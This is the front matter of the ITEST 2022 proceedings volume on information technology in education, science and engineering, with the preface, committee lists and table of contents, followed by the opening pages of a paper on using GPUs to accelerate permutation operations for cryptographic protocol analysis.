287 67 100MB
English Pages 771 [772] Year 2023
Lecture Notes on Data Engineering and Communications Technologies 178
Emil Faure · Olena Danchenko · Maksym Bondarenko · Yurii Tryus · Constantine Bazilo · Grygoriy Zaspa Editors
Information Technology for Education, Science, and Technics Proceedings of ITEST 2022
Lecture Notes on Data Engineering and Communications Technologies Series Editor Fatos Xhafa, Technical University of Catalonia, Barcelona, Spain
178
The aim of the book series is to present cutting edge engineering approaches to data technologies and communications. It will publish latest advances on the engineering task of building and deploying distributed, scalable and reliable data infrastructures and communication systems. The series will have a prominent applied focus on data technologies and communications with aim to promote the bridging from fundamental research on data science and networking to data engineering and communications that lead to industry products, business knowledge and standardisation. Indexed by SCOPUS, INSPEC, EI Compendex. All books published in the series are submitted for consideration in Web of Science.
Emil Faure · Olena Danchenko · Maksym Bondarenko · Yurii Tryus · Constantine Bazilo · Grygoriy Zaspa Editors
Information Technology for Education, Science, and Technics Proceedings of ITEST 2022
Editors Emil Faure Department of Information Security and Computer Engineering Cherkasy State Technological University Cherkasy, Ukraine
Olena Danchenko Department of Computer science and Systems Analysis Cherkasy State Technological University Cherkasy, Ukraine
Maksym Bondarenko Department of Instrumentation, Mechatronics and Computerized Technologies Cherkasy State Technological University Cherkasy, Ukraine
Yurii Tryus Department of Computer science and Systems Analysis Cherkasy State Technological University Cherkasy, Ukraine
Constantine Bazilo Department of Instrumentation, Mechatronics and Computerized Technologies Cherkasy State Technological University Cherkasy, Ukraine
Grygoriy Zaspa Department of Software of Automated Systems Cherkasy State Technological University Cherkasy, Ukraine
ISSN 2367-4512 ISSN 2367-4520 (electronic) Lecture Notes on Data Engineering and Communications Technologies ISBN 978-3-031-35466-3 ISBN 978-3-031-35467-0 (eBook) https://doi.org/10.1007/978-3-031-35467-0 © The Editor(s) (if applicable) and The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 This work is subject to copyright. All rights are solely and exclusively licensed by the Publisher, whether the whole or part of the material is concerned, specifically the rights of translation, reprinting, reuse of illustrations, recitation, broadcasting, reproduction on microfilms or in any other physical way, and transmission or information storage and retrieval, electronic adaptation, computer software, or by similar or dissimilar methodology now known or hereafter developed. The use of general descriptive names, registered names, trademarks, service marks, etc. in this publication does not imply, even in the absence of a specific statement, that such names are exempt from the relevant protective laws and regulations and therefore free for general use. The publisher, the authors, and the editors are safe to assume that the advice and information in this book are believed to be true and accurate at the date of publication. Neither the publisher nor the authors or the editors give a warranty, expressed or implied, with respect to the material contained herein or for any errors or omissions that may have been made. The publisher remains neutral with regard to jurisdictional claims in published maps and institutional affiliations. This Springer imprint is published by the registered company Springer Nature Switzerland AG The registered company address is: Gewerbestrasse 11, 6330 Cham, Switzerland
Preface
The proceedings include chapters on the main directions in development of information technologies and systems and their applications in education, science, technology, economics, management, and medicine. The chapters are grouped in parts and consider issues related to computer modeling of physical, chemical, and economic processes; implementing information and communication technology; research and management of complex systems; training IT students at higher education institution; information security. The volume opens with the first part titled “Theoretical and Practical Aspects for Creating and Optimizing Modern Information and Communication Systems.” The authors of the first chapter present profound research of the graphics processing units and determine their ability to be used for accelerating operations on permutations in three-pass cryptographic protocols. The second chapter is devoted to verifying the feasibility of a significant increase in the radio communications stability without introducing structural redundancy into the system. The third chapter undertakes research on the effectiveness of a combined approach to simulation modeling software. The results include the convolution method and an example of its use in the analysis of dynamic properties of models with parallelism and testing the methodology to detect functional disadvantages in reduced simulation models of software components. The second part “System Information Technology in Complex Systems Modeling” focuses on the Ukrainian airways network, which is a part of the global air transportation system, as well as the ergatic aircraft control system and assessing the quality of pilot training based on the analysis of changes in aircraft flight parameters. The third part titled “Information Technology in Engineering and Robotics” opens with the sixth chapter that investigates multimodal transport problems containing three means of transport and two objective functions. The authors consider the feasibility of reducing a multicriteria multimodal transport problem to a classical transport problem. The part continues with the chapter on the results of numerical experiments aimed at studying the stress–strain state of combined steel and concrete structures and separate elements under a load and ends with the chapter related to developing the process of intellectual control over optical products’ mechanical characteristics, its automation, as well as reducing computational complexity while increasing accuracy and reliability. The fourth part titled “Information and Communication Technology in Management” proposes to use the Analytic Hierarchy Process (AHP) to compare the input tasks of time management on the criteria of importance and urgency. The obtained experimental results confirm the expediency of using the authors’ combination of the Eisenhower matrix method and the AHP to solve time management problems. The first chapter of the fifth part “Information Technology in Intelligent Computing” formulates the principles and tasks for intellectualization of the project planning process. The concept of an intelligent add-on over project management software tools is proposed.
vi
Preface
The next chapter presents a method for analytical information processing that gives a possibility to forecast the development trends of the table tennis equipment market. The sixth part titled “Information and Communication Systems and Networks” starts with the report on the research, development, and implementation of a method for permutation transmission over communication channels with a bit error probability close to 0.5. The next chapter proposes an intelligent signal measurement technique for spread spectrum software defined in cognitive radio systems. A detailed analysis of the measurement accuracy for the proposed technique is presented. Then, the authors improve the 5G network architecture of the enterprise for further optimization of the production process. A 5G network planning method has been developed for enterprise production processes consisting of radio network covering, consecutive ensuring location definition for each basic station, connection quantity limit and its dependability, and communication transition segment construction. The sixth part continues with the chapter that offers a new solution of an important cybersecurity problem, namely system logs protection based on blockchains. The proposed system does not require deployment of additional infrastructure and can be used within the existing architecture for collecting information about the operating system. The last chapter of the sixth part models information flows in operating systems, which identify threats to information security more effectively. The seventh part titled “Information and Communication Technology in Scientific Research” contains four chapters. The first chapter analyzes the possibilities of using transdisciplinary ontology to represent information about the work of Ivan Franko. The authors of the next chapter present testing results of a software service to analyze reactions to a moving object, which provides organization and convenient operational control over the diagnostic procedure. The authors pay special attention to the prospects of applying this software service in sports, medical, psychological, physiological, aerospace, as well as in pedagogical practice to diagnose the functional state of the central nervous system. The third chapter of the seventh part theoretically substantiates the model for studying e-infrastructure ecosystem in Ukrainian universities to foster development of open science in Ukraine. The part closes with the scheme for the communicative process of interaction of the objects in the “driver-vehicle-environment” (D-V-E) system. The authors propose to impose a system of properties inherent in a person on each object. The chapter presents a scheme for optimizing communication relationships, based on the reactions of the driver’s senses. The eighth part titled “Computer Modeling and Information Systems in Economics” examines the multifractal cross-correlation relationships between stock and cryptocurrency markets. The study also endeavors to build a data processing model for improving the e-commerce efficiency. The authors propose a cluster analysis of online markets that consist of household products of an enterprise. The options how e-commerce can develop and the marketing strategy can improve are determined. The ninth part titled “Computer Modeling in Physical and Chemical Processes” starts with the study on the dependence of the endurance limit of bowl cutter knives on their design parameters, as well as the study on the hydrodynamics of raw materials being ground in bowl cutters, meat grinders, and emulsifiers to justify new ways and to increase the productivity of these machines. The authors of the next chapter have created a computer model for the process of measuring continuously changing profiles of
Preface
vii
electrical conductivity and magnetic permeability in objects with a surface eddy current probe as a tool for developing a computationally efficient metamodel on artificial neural networks, necessary to solve the in-verse electrodynamic problem. The process of plastic deformation of steel DC04 is also investigated as a complex, nonlinear, irreversible, and self-organized process. Measures for the quantitative assessment of the irreversibility of the deformation process are proposed. The ninth part continues with the research on chemical composition of hybrid eco-friendly biodegradable filled composites by a computer modeling method. An outcome of the research are the models for forecasting the performance properties of composites depending on their chemical composition. Then, printer layouts for FDM process are analyzed and systematized. It is shown that the use of fundamentally new approaches, which involve changing the base shape and movement type, in particular, replacing the traditional table with cylindrical rotating, allows one to better print products with thin cylindrical shells form. The last chapter of the ninth part investigates computer modeling of the spectrum of primary beaten-out atoms and the concentration of point radiation defects irradiated with electrons using cascade and probabilistic method. The study makes it apparent that accounting for energy losses makes a significant contribution to the primary beaten-out atoms and to the defect concentration. The tenth part is titled “Information Systems in Medicine.” Here, the authors of the first chapter demonstrate that mathematical modeling enables developing effective scientifically substantiated preventive and anti-epidemic measures. A model for gradient boosting is built to calculate the predicted incidence of COVID-19. The next chapter analyzes the prospects of introducing a patient-oriented digital clinic with internet of medical things (IoMT) support. This chapter also discusses the synthesis of data-generating personal medical components and artificial intelligence, machine learning, deep learning, virtual reality, augmented reality, blockchain technologies in the environment of digital clinic based on IoMT to improve the quality and availability of health care. The eleventh part titled “Information and Communication Technology in Education” states that cybersecurity as a part of information technology requires the teachers’ sustainable professional development. The authors consider the stages in which the process of training specialists in cybersecurity is built. The experience of introducing active learning methods into the educational process is presented, and its results are analyzed. The authors of the next chapter believe that learning through life becomes an important part of personal and professional development in a formal, informal, or non-formal environment. The study reveals four types of lifelong learning situations with different primary recommendation methods in each case. A generalized schema for providing recommendations in lifelong e-learning is suggested. The first chapter of the twelfth part titled “Training IT Experts at University” aims at creating applied computer developments in the educational process for chemiststechnologists. It reveals the use of all functions of independent work, i.e.: cognitive, prognostic, educational, corrective, and independent ones. The authors of the next chapter are convinced that the rapid recovery of the Ukrainian economy in the post-war period is possible only when there is a sufficient number of competitive and motivated IT specialists. The study offers a deep insight into the main problems of Ukrainian universities in the field of training IT specialists. The thirteenth part titled “Information Security” opens with the chapter demonstrating that characteristics of the microwave range devices can be improved by applying both
viii
Preface
new elemental base and new circuitry decisions. Mathematical models of W-parameters for structures of bipolar transistors having potential instability in a wide frequency range are developed and their parameters are estimated within the frequency range. The goal of the next chapter is to identify and understand the vulnerabilities of hardware-based systems and related mechanisms, in order to improve the corresponding security measures. The research has resulted in creating a prototype of a web-based system that collects information about modern hardware-related vulnerabilities and provides the users with appropriate recommendations based on a specific situation. The authors of the next chapter show that when two or more wireless users operate simultaneously and differ in speed performance, the phenomena of air monopolization appear, which becomes obvious in imperfection of the built-in mechanisms of the IEEE 802.11 standard and the distribution of airtime. Implementing algorithms for the operation of the Airtime Fairness technology are considered, and the theoretical substantiation of the efficiency of this technology is presented. The next chapter studies the existing vulnerabilities of the 5G ecosystem. The authors of the chapter propose a new cyber security function that considers machine learning algorithms. The function contains firewall, intrusion detection, and intrusion protection systems. The described model has been integrated into existing 5G architecture. The object of research in the next chapter is the process of digital processing of speech signals in voice authentication systems. The chapter considers the procedures for generating and directing voice signal phase data use in authentication systems. The feasibility of phase data use is proved. The thirteenth part continues with extending the adaptive singular spectrum analysis method to multiple channel case (to signal processing in antenna array). The embedding process that consists of selecting a part of data vector to form the data matrix is explained. The relationship between the vector smoothing operator used in antenna array signal processing and embedding process is also shown. The authors of the next chapter describe energy systems in a number of countries that have improved and developed based on the concept of deep integration of energy as well as infocomm grids. The chapter highlights the concept of Smart Grid, possible vectors of attacks and identification of attack of false data injection into the flow of measuring received from the sensors. The next chapter is devoted to the research of global experience of implementing private 4G/5G networks. A network structure is seen with consideration of peculiarities in the working process of a polygon measuring complex. Structure types of private 4G/5G networks have been compared. In the closing chapter, a mathematical model for polarization switching in a ferroelectric capacitor has been developed. The model adequately reflects the processes of writing and reading elements of the FRAM-memory and may be utilized in an automated design of ferroelectric storage elements and devices. Emil Faure Olena Danchenko Maksym Bondarenko Yurii Tryus Constantine Bazilo Grygoriy Zaspa
Organization
General Chair Oleg Grygor
Cherkasy State Technological University, Ukraine
Online Conference Organizing Chair Yurii Tryus
Cherkasy State Technological University, Ukraine
Program Chairs Pavlo Kasyanov Valeriy Bykov
Oleksandr Volkov
Grygoriy Torbin Yaroslav Shramko Tetyana Morozyuk Dariusz Czerwi´nski Darkhan Akhmed-Zaki Yurii Tryus Emil Faure
National Technical University of Ukraine “Igor Sikorsky Kyiv Polytechnic Institute,” Ukraine Institute for Digitalisation of Education of the National Academy of Educational Sciences of Ukraine, Ukraine International Research and Training Center for Information Technologies and Systems under the National Academy of Sciences of Ukraine and the Ministry of Education and Science of Ukraine, Ukraine Ukrainian State Dragomanov University, Ukraine Kryvyi Rih State Pedagogical University, Ukraine Technische Universität Berlin, Germany Lublin University of Technology, Poland Astana IT University, Kazakhstan Cherkasy State Technological University, Ukraine Cherkasy State Technological University, Ukraine
Publication Chairs Yurii Tryus Emil Faure
Cherkasy State Technological University, Ukraine Cherkasy State Technological University, Ukraine
x
Organization
Publicity Chairs Liudmyla Usyk Anton Maksymov
Cherkasy State Technological University, Ukraine Cherkasy State Technological University, Ukraine
Program Committee Members Michael Orloff Elena Eyngorn Juriy Plotkin Jerzy Montusiewicz Marek Milosz Grzegorz Koziel Mikolaj Karpinski Andrii Biloshchytskyi Omirbayev Serik Mukhatayev Aidos Beibut Amirgaliyev Didar Yedilkhan Jamil Al-Azzeh Maxim Iavich Arnold Kiv Dmytro Ageyev Peter Bidyuk Maxsym Bondarenko Volodymyr Halchenko Sergiy Gnatyuk Serhii Holub Andriy Gusak Olena Danchenko Vladimir Kukharenko Oleksandr Lemeshko Tetyana Mazurok Roman Odarchenko Volodymyr Palahin
Technische Universität Berlin, Germany Technische Universität Berlin, Germany Berlin School of Economics and Law, Germany Lublin University of Technology, Poland Lublin University of Technology, Poland Lublin University of Technology, Poland University of Bielsko-Biala, Poland Astana IT University, Kazakhstan Astana IT University, Kazakhstan Astana IT University, Kazakhstan Astana IT University, Kazakhstan Astana IT University, Kazakhstan Al-Balqa University, Jordan Caucasus University, Georgia Ben-Gurion University of the Negev, Israel Kharkiv National University of Radio Electronics, Ukraine National Technical University of Ukraine “Igor Sikorsky Kyiv Polytechnic Institute,” Ukraine Cherkasy State Technological University, Ukraine Cherkasy State Technological University, Ukraine National Aviation University, Ukraine Cherkasy State Technological University, Ukraine Bohdan Khmelnytsky National University of Cherkasy, Ukraine Cherkasy State Technological University, Ukraine National Technical University “Kharkiv Polytechnic Institute” Kharkiv National University of Radio Electronics, Ukraine South Ukrainian National Pedagogical University named after K. D. Ushynsky, Ukraine National Aviation University, Ukraine Cherkasy State Technological University, Ukraine
Organization
Stanislav Pervuninsky Tatiana Prokopenko Tamara Radivilova Viktor Romanenko Volodymyr Rudnytskyi Serhiy Semerikov Oleksandr Serkov Vitaliy Snytyuk Vladimir Soloviev Oleh Spirin Iurii Teslia Yurii Tryus Emil Faure Eugene Fedorov Vasyl Franchuk Svitlana Lytvynova
Alla Manako
Volodymyr Artemchuk Yevheniya Savchenko-Synyakova
Mariya Shyshkina
xi
Cherkasy State Technological University, Ukraine Cherkasy State Technological University, Ukraine Kharkiv National University of Radio Electronics, Ukraine National Technical University of Ukraine “Igor Sikorsky Kyiv Polytechnic Institute,” Ukraine Cherkasy State Technological University, Ukraine Kryvyi Rih State Pedagogical University, Ukraine National Technical University “Kharkiv Polytechnic Institute” Taras Shevchenko National University of Kyiv, Ukraine Kryvyi Rih State Pedagogical University, Ukraine University of Educational Management, Ukraine Cherkasy State Technological University, Ukraine Cherkasy State Technological University, Ukraine Cherkasy State Technological University, Ukraine Cherkasy State Technological University, Ukraine Ukrainian State Dragomanov University, Ukraine Institute for Digitalisation of Education of the National Academy of Educational Sciences of Ukraine, Ukraine International Research and Training Center for Information Technologies and Systems under the National Academy of Sciences of Ukraine and the Ministry of Education and Science of Ukraine, Ukraine G.E. Pukhov Institute for Modelling in Energy Engineering, Ukraine International Research and Training Center for Information Technologies and Systems under the National Academy of Sciences of Ukraine and the Ministry of Education and Science of Ukraine, Ukraine Institute for Digitalisation of Education of the National Academy of Educational Sciences of Ukraine, Ukraine
Contents
Theoretical and Practical Aspects for Creating and Optimizing Modern Information and Communication Systems Accelerating Operations on Permutations Using Graphics Processing Units . . . . Artem Lavdanskyi, Emil Faure, Artem Skutskyi, and Constantine Bazilo Machine Learning Technique Based on Gaussian Mixture Model for Environment Friendly Communications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Oleksii Holubnychyi, Yevhen Gabrousenko, Anatolii Taranenko, Olexandr Slobodian, and Olena Zharova Applying a Combined Approach to Modeling of Software Functioning . . . . . . . . Oksana Suprunenko, Borys Onyshchenko, Julia Grebenovych, and Petro Nedonosko
3
13
30
System Information Technology in Complex Systems Modeling Impact of Closed Ukrainian Airspace on Global Air Transport System . . . . . . . . Oleg Ivashchuk and Ivan Ostroumov Analysis of Approach Attitude for the Evaluation of the Quality of Pilot Training . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Yurii Hryshchenko, Victor Romanenko, Maksym Zaliskyi, and Tetiana Fursenko
51
65
Information Technology in Engineering and Robotics Solving Multimodal Transport Problems Using Algebraic Approach . . . . . . . . . . Sergii Mogilei, Artem Honcharov, and Yurii Tryus
83
Numerical Analysis of the Stress-Strain State of Combined Steel and Concrete Structures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102 Grygorii Gasii, Olena Hasii, Ivan Skrynnik, and Oleksandr Lizunkov Intellectual Control of Mechanical Characteristics of Optical Products . . . . . . . . 113 Iryna Makarenko, Eugene Fedorov, Yuliia Bondarenko, and Yevhenii Bondarenko
xiv
Contents
Information and Communication Technology in Management Combined Method of Solving Time Management Tasks and Its Implementation in the Decision Support System . . . . . . . . . . . . . . . . . . . . . . . . . . . 131 Anton Maksymov and Yurii Tryus Information Technology in Intelligent Computing Development of the Concept of Intelligent Add-On over Project Planning Instruments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 149 Iurii Teslia, Oleksii Yegorchenkov, Iulia Khlevna, Nataliia Yegorchenkova, Yevheniia Kataeva, Andrii Khlevny, and Ganna Klevanna Self-organization of the Table Tennis Market Information Bank Based on Neural Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162 Valeriy Tazetdinov, Svitlana Sysoienko, and Mykola Khrulov Information and Communication Systems and Networks A Method for Reliable Permutation Transmission in Short-Packet Communication Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 177 Emil Faure, Anatoly Shcherba, Bohdan Stupka, Iryna Voronenko, and Alimzhan Baikenov Intelligent Signal Measurement Technique for Spread Spectrum Software Defined Cognitive Radio Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 196 Oleksii Holubnychyi, Maksym Zaliskyi, Anatolii Taranenko, Yevhen Gabrousenko, and Olga Shcherbyna Optimal Structure Construction of Private 5G Network for the Needs of Enterprises . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 208 Roman Odarchenko, Tatiana Smirnova, Oleksii Smirnov, Serhii Bondar, and Dmytro Volosheniuk Linked List Systems for System Logs Protection from Cyberattacks . . . . . . . . . . 224 Victor Boyko, Mykola Vasilenko, and Valeria Slatvinska Information Flows Formalization for BSD Family Operating Systems Security Against Unauthorized Investigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 235 Maksym Lutskyi, Sergiy Gnatyuk, Oleksii Verkhovets, and Artem Polozhentsev
Contents
xv
Information and Communication Technology in Scientific Research Ontological Modeling in Humanities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 249 Viktoriia Atamanchuk and Petro Atamanchuk Software Service for Analyzing Reactions to a Moving Object . . . . . . . . . . . . . . . 260 Constantine Bazilo, Yuriy Petrenko, Liudmyla Frolova, Stanislav Kovalenko, Kostiantyn Liubchenko, and Andrii Ruban Modelling the Universities’ E-Infrastructure for the Development of Open Science in Ukraine . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275 Iryna Drach, Olha Petroye, Nataliia Bazeliuk, Oleksandra Borodiyenko, and Olena Slobodianiuk Optimization of the Communicative Process in the System “Driver-Vehicle-Environment” . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 299 Volodymyr Lytovchenko and Mykola Pidhornyy Computer Modeling and Information Systems in Economics The Analysis of Multifractal Cross-Correlation Connectedness Between Bitcoin and the Stock Market . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 323 Andrii Bielinskyi, Vladimir Soloviev, Victoria Solovieva, Andriy Matviychuk, and Serhiy Semerikov Using Data Science Tools in E-Commerce: Client’s Advertising Campaigns vs. Sales of Enterprise Products . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 346 Tetiana Zatonatska, Tomasz Wołowiec, Oleksandr Dluhopolskyi, Oleksandr Podskrebko, and Olena Maksymchuk Computer Modeling in Physical and Chemical Processes Simulation of Influence of Constructive Parameters of Meat Bowl Cutterknives on Their Endurance at Alternative Oscillations . . . . . . . . . . . . . . . . . 363 Olexandr Batrachenko Modelling of Hydrodynamics of Meat Raw Materials When Crushing It in Meat Cutting Machines . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 386 Olexandr Batrachenko Computer Simulation of the Process of Profiles Measuring of Objects Electrophysical Parameters by Surface Eddy Current Probes . . . . . . . . . . . . . . . . . 411 Volodymyr Halchenko, Ruslana Trembovetska, Constantine Bazilo, and Natalia Tychkova
xvi
Contents
Irreversibility of Plastic Deformation Processes in Metals . . . . . . . . . . . . . . . . . . . 425 Arnold Kiv, Arkady Bryukhanov, Andrii Bielinskyi, Vladimir Soloviev, Taras Kavetskyy, Dmytro Dyachok, Ivan Donchev, and Viktor Lukashin Computer Modeling of Chemical Composition of Hybrid Biodegradable Composites . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 446 Vladimir Lebedev, Denis Miroshnichenko, Dmytro Savchenko, Daria Bilets, Vsevolod Mysiak, and Tetiana Tykhomyrova A New FDM Printer Concept for Printing Cylindrical Workpieces . . . . . . . . . . . . 459 Alexandr Salenko, Anton Kostenko, Daniil Tsurkan, Andryi Zinchuk, Mykhaylo Zagirnyak, Vadim Orel, Roman Arhat, Igor Derevianko, and Aleksandr Samusenko Computer Modeling of Processes of Radiation Defect Formation in Materials Irradiated with Electrons . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 484 Tat’yana Shmygaleva and Aziza Srazhdinova Information Systems in Medicine Forecasting of COVID-19 Epidemic Process in Ukraine and Neighboring Countries by Gradient Boosting Method . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 503 Dmytro Chumachenko, Tetyana Chumachenko, Ievgen Meniailov, Olena Muradyan, and Grigoriy Zholtkevych The Internet of Medical Things in the Patient-Centered Digital Clinic’s Ecosystem . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 515 Inna Kryvenko, Anatolii Hrynzovskyi, and Kyrylo Chalyy Information and Communication Technology in Higher Education Implementation of Active Cybersecurity Education in Ukrainian Higher School . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 533 Volodymyr Buriachok, Nataliia Korshun, Oleksii Zhyltsov, Volodymyr Sokolov, and Pavlo Skladannyi Recommendation Methods for Information Technology Support of Lifelong Learning Situations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 552 Mykhailo Savchenko, Kateryna Synytsya, and Yevheniya Savchenko-Synyakova
Contents
xvii
Training IT Experts in Universities Creating of Applied Computer Developments in the Educational Process in the Training of Chemists-Technologists . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 567 Olga Sergeyeva and Liliya Frolova The Potential of Higher Education in Ukraine in the Preparation of Competitive IT Specialists for the Post-War Recovery of the Country’s Economy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 582 Oksana Zakharova and Larysa Prodanova Information Security Standard and Nonstandard W-parameters of Microwave Active Quadripole on a Bipolar Transistor for Devices of Infocommunication Systems . . . . . . . . . . . 599 Andriy Semenov, Oleksandr Voznyak, Andrii Rudyk, Olena Semenova, Pavlo Kulakov, and Anna Kulakova Developing Security Recommender System Using Content-Based Filtering Mechanisms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 619 Maksim Iavich, Giorgi Iashvili, Roman Odarchenko, Sergiy Gnatyuk, and Avtandil Gagnidze Analysis of Airtime Fairness Technology Application for Fair Allocation of Time Resources for IEEE 802.11 Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 635 Liubov Tokar and Yana Krasnozheniuk 5G Security Function and Its Testing Environment . . . . . . . . . . . . . . . . . . . . . . . . . 656 Maksim Iavich, Sergiy Gnatyuk, Giorgi Iashvili, Roman Odarchenko, and Sergei Simonov Results of Experimental Research on Phase Data of Processed Signals in Voice Authentication Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 679 Mykola Pastushenko and Yana Krasnozheniuk Sensor Array Signal Processing Using SSA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 697 Volodymyr Vasylyshyn Method for Detecting FDI Attacks on Intelligent Power Networks . . . . . . . . . . . . 715 Vitalii Martovytskyi, Igor Ruban, Andriy Kovalenko, and Oleksandr Sievierinov Implementation of Private 4G/5G Networks for Polygon Measuring Complex Provision . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 732 Igor Shostko and Yuliia Kulia
xviii
Contents
Mathematical Model of Electric Polarization Switching in a Ferroelectric Capacitor for Ferroelectric RAM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 749 Inna Baraban, Andriy Semenov, Serhii Baraban, Olena Semenova, Mariia Baraban, and Andrii Rudyk Author Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 771
Theoretical and Practical Aspects for Creating and Optimizing Modern Information and Communication Systems
Accelerating Operations on Permutations Using Graphics Processing Units Artem Lavdanskyi(B) , Emil Faure, Artem Skutskyi, and Constantine Bazilo Cherkasy State Technological University, Cherkasy, Ukraine [email protected]
Abstract. GPUs (graphics processing units) are used in many modern computer systems. They consist of a large number of low-performance computing units that can be used for operations in parallel. In this case, the overall algorithm performance significantly increases compared to the CPU (central processing unit) use. Tests against a brute-force attack of cryptoprotocols that use operations on permutations, such as a three-pass cryptographic protocol, can be performed in parallel for different permutations. Therefore, it is important to determine the ability to use graphics processing units to accelerate operations on permutations. For this, the following tasks have been solved in this study: the most used operations on permutations have been defined; the program code that implements these operations and can use graphics processing units’ hardware has been developed; the performance of different approaches, including computing on CPU and various modes of computing on GPU, has been assessed. The results of the study indicate the effectiveness of using GPU hardware units to accelerate the multiplication of permutations, but if at least 5 such operations are performed simultaneously. Keywords: Permutations · graphics processing unit · GPU · CUDA · brute-force attack · cryptographic protocol · general-purpose computing on graphics processing units
1 Introduction A reliable and secure cryptographic protocol must meet requirements to guarantee that using it in real scenarios is safe. For this purpose, different statistical tests or evaluations may be used. As an example, statistical tests can be used to check the randomness of protocol output, like NIST STS [1], Diehard tests [2], autocorrelation criterion [3, 4], TestU01 [5], and others [6, 7]. One of the evaluations used to check the strength of a cryptographic protocol is its resistance to a brute-force attack. It can be measured in the time needed for a cryptanalyst to determine protocol keys, which allows him to decrypt the encrypted message. This time must be significant. Like any other cryptographic protocol, three-pass cryptographic protocol based on permutations [8] can be hacked using a brute-force attack. However, the parameters of the protocol must be determined in such a way that the possible time of hacking of the protocol meets the requirements for its cryptographic strength. But various hardware © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 3–12, 2023. https://doi.org/10.1007/978-3-031-35467-0_1
4
A. Lavdanskyi et al.
blocks, such as SIMD (single instruction, multiple data) instructions or GPUs (graphics processing units), can increase the speed of picking up possible cryptographic keys used in the protocol. Thus, it is necessary to know the speed of key search using specialized hardware units to establish the parameters of the transformation, in particular, the length of the key, and to ensure certain strength of a cryptographic protocol. On the other hand, the speed of communication is important when a protocol is used to communicate between devices. This speed can be limited by the transmission channel or by protocol algorithms running on the device to encrypt and decrypt data. In most cases, we cannot fix slow transmission channel speed, but we can increase overall performance by adapting protocol algorithms, in particular using hardware blocks, such as SIMD instructions or parallel computing on GPUs (if performance is limited by algorithm software implementation). Three-pass cryptographic protocol based on permutations [8] uses different operations with permutations, such as permutations multiplication, cycle decomposition for permutations into a product of disjoint cycles, permutation inversion, and others. In the simplest case, the operations used to operate the protocol are calculated on a generalpurpose CPU (central processing unit). It is possible to use SIMD instructions to speed up operations on permutations, as described in [9]. One of the other ways to increase the performance for operations on permutations can be achieved using modern GPUs [10–14]. The purpose of the study is to increase the speed of operations on permutations used in the three-pass cryptographic protocol [8] through the use of the CUDA (Compute Unified Device Architecture) platform. For this purpose, we need to solve the following tasks: • The most used operations on permutations must be determined. • The program code that implements operations on permutations and can use graphics processing units’ hardware must be created. • The performance of different approaches, including computing on CPU and various modes of computing on GPU, must be assessed and compared.
2 Materials and Methods Various hardware systems can be used when data exchange or data processing is performed. It can be a personal computer, mobile phone, a server in the data center, etc. Some of these devices have hardware blocks that can help to speed up some of the typical computational algorithms, like SIMD blocks in the CPU or CUDA cores in the GPU. Those hardware blocks can solve some simple operations, but do it extremely fast [15]. Also, there are hardware realizations of different cryptographic algorithms in modern CPUs, AES as an example, that can be used to accelerate those [16]. But it is not the case for modern cryptoprotocols because a lot of time can pass from creating a protocol to its implementation in hardware. Initially, all calculations were made on the CPU and the GPU was used only for showing to the user the results of those operations on the screen via some interfaces. As requirements for tasks such as images and video processing, 3D modeling, and games increase, GPUs become more powerful and gain specialized units such as programmable
Accelerating Operations on Permutations Using GPU
5
